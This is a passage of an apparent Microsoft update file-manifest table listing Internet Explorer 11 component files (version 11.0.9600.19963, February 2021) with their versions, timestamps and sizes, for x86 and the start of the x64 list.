\ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 11:46| 341,896 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2018| 6:18| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 489,472 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 12-Feb-2021| 16:23| 11,892 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.19963| 12-Feb-2021| 18:54| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 52,736 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 18:48| 11,776 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 18:46| 341,504 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:11| 1,155,584 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 18:59| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:23| 3,228 \nieetwcollector.exe| 11.0.9600.19963| 12-Feb-2021| 18:37| 104,960 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 47,616 \nieetwcollectorres.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 4,096 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 18:39| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:51| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2018| 6:39| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2018| 6:39| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2018| 6:39| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2018| 6:39| 11,340 \nbing.ico| Not versioned| 23-Sep-2018| 6:33| 5,430 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 18:37| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Feb-2021| 13:19| 2,956 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:35| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 64,000 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 1,075,200 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 130,048 \ndesktop.ini| Not versioned| 23-Sep-2018| 6:26| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 23-Sep-2018| 6:27| 65 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2018| 6:27| 8,798 \nticrf.rat| Not versioned| 23-Sep-2018| 6:27| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 11:46| 228,232 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 30,720 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 62,464 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:30| 16,303 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:24| 91,136 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 23-Sep-2018| 6:26| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,066,432 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 476,160 \nieframe.ptxml| Not versioned| 12-Feb-2021| 16:23| 24,486 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:20| 475,648 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:47| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:48| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:49| 526,294 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:50| 499,654 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:51| 552,337 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:51| 944,559 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:20| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:52| 543,946 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:53| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:54| 526,557 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:55| 575,838 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:56| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:57| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:57| 570,737 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:58| 548,119 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:59| 639,271 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:00| 525,504 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:01| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:02| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:03| 488,488 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:04| 548,494 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:04| 559,343 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:05| 535,067 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:06| 541,455 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:06| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:07| 804,470 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:08| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:09| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:10| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:11| 503,909 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:11| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:12| 521,583 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:13| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:14| 420,082 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:15| 436,651 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:16| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.19963| 12-Feb-2021| 18:32| 668,672 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \n \n## \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 1,569,280 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 12:45| 810,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 31,744 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 39,424 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 32,768 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 37,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 38,400 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 30,720 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 25,600 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 24,576 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 20,992 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 21,504 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 21,504 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 46,592 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 56,320 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 57,856 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 49,664 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 47,616 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 49,152 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 55,296 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 45,056 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 39,424 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 35,840 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 